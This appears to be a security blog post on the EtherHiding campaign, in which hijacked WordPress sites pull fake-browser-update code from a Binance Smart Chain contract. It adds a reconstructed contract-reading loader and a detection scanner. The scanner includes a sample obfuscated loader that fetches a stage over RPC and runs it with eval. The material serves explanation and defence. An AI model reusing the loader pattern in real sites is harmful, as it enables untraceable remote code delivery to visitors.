A new malware campaign called “EtherHiding” has emerged that uses Binance’s Smart Chain (BSC) contracts to host parts of a malicious code chain. Guardio researchers, who disclosed the campaign, describe it as a novel approach: rather than serving the attack code from a conventional host, the threat actors use a smart contract as the hosting layer for the code that drives their attack.
Nati Tal and Oleg Zaytsev of Guardio Labs disclosed that:
“EtherHiding presents a novel twist on serving malicious code by utilizing Binance’s Smart Chain contracts to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting.”
The EtherHiding campaign begins with threat actors hijacking vulnerable WordPress sites and using them to trick visitors into downloading fake browser updates that are in fact malware.
Nati and Oleg describe the situation as follows:
“Over the last two months, threat actors have been leveraging a vast array of hijacked WordPress sites; these threat actors have misled users into downloading malicious fake “browser updates”.”
The attackers initially hosted the code on abused Cloudflare Workers hosts. After those hosts were taken down, they quickly switched to the blockchain, taking advantage of its decentralized and anonymous nature to host their malicious code where no single provider can remove it.
Guardio’s researchers noted that:
“While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they’ve quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain. This campaign is up and harder.”
THE FAKE BROWSER CAMPAIGN TRICK:
Guardio Labs describes the “fake browser update” EtherHiding campaign as one that has been running for the last two months, with the sole aim of infecting visitors with malware. The threat actors use a website they have defaced to show an overlay demanding a browser update before the site’s real content is displayed, typically on a site the unsuspecting victim visits regularly. Unbeknownst to the victim, the “update” is an infostealer such as Amadey, Lumma, or RedLine.
Because the code that drives the overlay is fetched from a smart contract rather than stored on the compromised site, the threat actor can remotely alter it at will: adjusting tactics, swapping out blocked domains, replacing detected payloads, or displaying any message they like, all without needing to re-access the WordPress site.
THE EVOLUTION OF CLEARFAKE USING BINANCE:
On the compromised site, the injected loader creates a fresh contract instance and initializes it with the attacker-controlled contract address and the contract’s Application Binary Interface (ABI), which specifies the contract’s functions and structure. It then calls the contract to retrieve the next stage of the malicious code.
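To make that mechanism concrete, here is an added example written for this page (it is not Guardio’s code and not the campaign’s actual loader) of the two things a loader of this kind has to do: build the read-only `eth_call` JSON-RPC request that reads the contract, and ABI-decode the `string` the contract returns. The contract address, the function selector `0x20965255` (a placeholder standing in for the first four bytes of keccak256 of the real function signature), the RPC endpoint and the RPC response are all assumptions constructed for the example.

```javascript
// Added example for this page: how an EtherHiding-style loader reads its next
// stage out of a smart contract. It is not Guardio's code and not the campaign's
// loader. Contract address, selector, endpoint and the RPC response are
// placeholders constructed for the example.
//
// Security-relevant point: reading contract state is a JSON-RPC "eth_call".
// It needs no wallet, costs no gas, writes nothing to the chain and leaves no
// transaction behind, so the fetch is free and silent in the victim's browser,
// while the attacker can later swap the payload with a single transaction that
// updates the contract's storage. The request the loader sends never changes.

const RPC_ENDPOINT = "https://bsc-dataseed.binance.org/";              // a public BSC RPC endpoint (assumed here)
const CONTRACT_ADDRESS = "0x1111111111111111111111111111111111111111"; // placeholder, not a real contract
const FUNCTION_SELECTOR = "0x20965255"; // placeholder; a real loader uses keccak256("fn()") truncated to 4 bytes

// JSON-RPC request for a read-only call: the `data` field is the ABI-encoded
// calldata, which for a no-argument function is just the 4-byte selector.
function buildEthCall(contractAddress, selector, id = 1) {
  return {
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    params: [{ to: contractAddress, data: selector }, "latest"],
  };
}

// 32-byte big-endian word as 64 hex characters.
const word = (n) => n.toString(16).padStart(64, "0");

// ABI encoding of a single `string` return value: a word holding the offset of
// the dynamic data (0x20 for a single return value), a word holding the byte
// length, then the UTF-8 bytes right-padded with zeros to a 32-byte boundary.
function abiEncodeString(str) {
  const data = Buffer.from(str, "utf8");
  const padding = Buffer.alloc((32 - (data.length % 32)) % 32);
  return "0x" + word(32) + word(data.length) + Buffer.concat([data, padding]).toString("hex");
}

// The inverse, with bounds checks: an RPC response is untrusted input, and a
// hostile or truncated response must not be allowed to read past the buffer.
function abiDecodeString(hex) {
  const bytes = Buffer.from(hex.replace(/^0x/, ""), "hex");
  const readWord = (pos) => {
    if (pos + 32 > bytes.length) throw new Error(`ABI word at ${pos} is outside the response`);
    return Number(BigInt("0x" + bytes.subarray(pos, pos + 32).toString("hex")));
  };
  const offset = readWord(0);
  const length = readWord(offset);
  if (offset + 32 + length > bytes.length) throw new Error("ABI string length exceeds the response");
  return bytes.subarray(offset + 32, offset + 32 + length).toString("utf8");
}

// What the loader does with a node's answer: unwrap the JSON-RPC envelope and
// decode the string. A real loader would then hand this string to eval() or
// new Function(); this example deliberately only returns it.
function extractStage(rpcResponse) {
  if (rpcResponse.error) throw new Error("RPC error: " + rpcResponse.error.message);
  if (typeof rpcResponse.result !== "string") throw new Error("RPC response has no result");
  return abiDecodeString(rpcResponse.result);
}

// Network version (Node 18+ for global fetch); not exercised offline.
// Usage: await fetchStage(RPC_ENDPOINT, CONTRACT_ADDRESS, FUNCTION_SELECTOR)
async function fetchStage(endpoint, contractAddress, selector) {
  const res = await fetch(endpoint, {
    method: "POST",
    headers: { "content-type": "application/json" },
    body: JSON.stringify(buildEthCall(contractAddress, selector)),
  });
  return extractStage(await res.json());
}

// Constructed sample: the node's reply if the contract currently stored this
// harmless second-stage script (the real campaign returns the fake-update overlay code).
const SAMPLE_STAGE = "document.body.insertAdjacentHTML('beforeend', '<div id=\"fake-update\">Your browser needs an update</div>');";
const SAMPLE_RPC_RESPONSE = { jsonrpc: "2.0", id: 1, result: abiEncodeString(SAMPLE_STAGE) };

console.log(JSON.stringify(buildEthCall(CONTRACT_ADDRESS, FUNCTION_SELECTOR)));
console.log(extractStage(SAMPLE_RPC_RESPONSE) === SAMPLE_STAGE ? "round trip ok" : "mismatch");
```

Two points worth noticing: the request body is the same every time, so there is nothing in the loader that has to change when the attacker changes the payload, and the decoder treats the node's answer as untrusted because a public RPC endpoint, or anything in the path to it, can hand back arbitrary bytes.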
MITIGATING THE ISSUE: A CHALLENGE:
Mitigating this issue is challenging because of the decentralized nature of blockchain systems. Once a smart contract is deployed, it operates autonomously and cannot simply be shut down by Binance. The only available recourse is a stop-gap: flagging the contract publicly so that the community is warned it is malicious or being abused. The address, which has been labelled “Fake_Phishing2561”, is still reachable and still delivers the malicious payload.
Researchers at Guardio emphasized that:
“Apparently as of today, there is no way to stop it. A critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims.”
Summarizing the event:
Hosting the code on a blockchain lets attackers serve it in a way that cannot be taken down. This campaign underscores the significant threat posed by malicious code hosted on a blockchain. Since the contract itself cannot be removed, the practical point of control is the compromised site: the most effective way to safeguard WordPress sites is to keep the WordPress core and plugins consistently updated, secure administrator credentials, and use strong passwords that are changed regularly. Guardio’s researchers also listed the Indicators of Compromise (IoCs) in their blog post.
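Because the defender’s leverage is on the compromised site rather than on the chain, here is an added example (written for this page, not Guardio’s tooling, and using generic heuristics rather than Guardio’s published IoCs) of a static check a WordPress administrator can run over page HTML or theme and plugin files to flag an injected loader of this kind. It looks for the combination a legitimate page rarely has: a BSC RPC endpoint or chain id, a read-only contract call, and dynamic execution of whatever came back. The two snippets it is run against are constructed for the example, and the `bsc-dataseed` hostname and chain id 56 are assumed indicators.

```javascript
// Added example for this page, not Guardio's tooling: a static check over page
// HTML, theme files or plugin files for an injected loader that fetches its next
// stage from a BNB Smart Chain contract. The indicators are generic heuristics
// chosen for this example, not Guardio's published IoCs; both samples below are
// constructed.

const INDICATORS = {
  bscRpc: [
    /bsc-dataseed/i,                        // public BSC RPC hostnames (assumed indicator)
    /chainId\W{0,3}(?:56|0x38)\b/i,         // BSC mainnet chain id in a provider config
  ],
  contractRead: [
    /["']eth_call["']/,                     // raw JSON-RPC read
    /new\s+(?:[\w$]+\.)*Contract\s*\(/,     // ethers: new ethers.Contract(...); web3: new web3.eth.Contract(...)
    /\babi\b|stateMutability/i,             // an inlined ABI fragment
  ],
  execution: [
    /\beval\s*\(/, /\[\s*["']eval["']\s*\]/, // eval(...) or window["eval"](...)
    /new\s+Function\s*\(/,
    /document\.write\s*\(/,
    /createElement\s*\(\s*["']script["']\s*\)/,
  ],
};

// Undo the two cheapest obfuscations before matching: \xHH / \uHHHH string
// escapes (e.g. "\x65\x76\x61\x6c" for "eval") and base64 literals passed to
// atob(), whose decoded content is appended so the patterns can see it.
function deobfuscate(js) {
  const text = js
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
  const decoded = [];
  for (const m of text.matchAll(/atob\s*\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)/g)) {
    decoded.push(Buffer.from(m[1], "base64").toString("latin1"));
  }
  return decoded.length ? text + "\n" + decoded.join("\n") : text;
}

// Returns which indicator categories fired and an overall verdict. All three
// categories together is the loader pattern; RPC plus one more is worth a look.
function scanForEtherHiding(pageSource) {
  const text = deobfuscate(pageSource);
  const hits = {};
  for (const [category, patterns] of Object.entries(INDICATORS)) {
    hits[category] = patterns.filter((re) => re.test(text)).map((re) => re.source);
  }
  const categoriesHit = Object.values(hits).filter((h) => h.length > 0).length;
  let verdict = "no indicators";
  if (categoriesHit === 3) verdict = "likely EtherHiding loader";
  else if (hits.bscRpc.length > 0 && categoriesHit === 2) verdict = "suspicious: BSC RPC plus another indicator";
  return { verdict, categoriesHit, hits };
}

// Constructed sample 1: an ordinary theme script.
const BENIGN_SNIPPET = `<script>
jQuery(function ($) {
  $(".menu-toggle").on("click", function () { $("#site-navigation").toggleClass("open"); });
});
</script>`;

// Constructed sample 2: a loader modelled on the technique described in the
// article, with the RPC URL hidden in base64 and "eval" hidden in hex escapes.
// The base64 is computed here rather than hand-typed; a real sample carries it inline.
const RPC_B64 = Buffer.from("https://bsc-dataseed.binance.org/").toString("base64");
const SUSPICIOUS_SNIPPET = String.raw`<script>
(async () => {
  const u = atob("${RPC_B64}");
  const r = await fetch(u, { method: "POST", headers: { "content-type": "application/json" },
    body: JSON.stringify({ jsonrpc: "2.0", id: 1, method: "eth_call",
      params: [{ to: "0x1111111111111111111111111111111111111111", data: "0x20965255" }, "latest"] }) });
  const j = await r.json();
  window["\x65\x76\x61\x6c"](decodeStage(j.result));
})();
</script>`;

for (const [name, snippet] of [["benign", BENIGN_SNIPPET], ["suspicious", SUSPICIOUS_SNIPPET]]) {
  const result = scanForEtherHiding(snippet);
  console.log(`${name}: ${result.verdict} (${result.categoriesHit}/3 categories)`);
}
```

The check is deliberately a triage heuristic, not a signature: a page that legitimately talks to BSC (a wallet dashboard, say) will trip the first two categories, which is why the verdict only calls the full three-way combination a likely loader. Run it over the rendered HTML as well as the files on disk, since the injection in this campaign sits in the page the visitor receives.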
Please do let us know in the comment section what are your thoughts about this.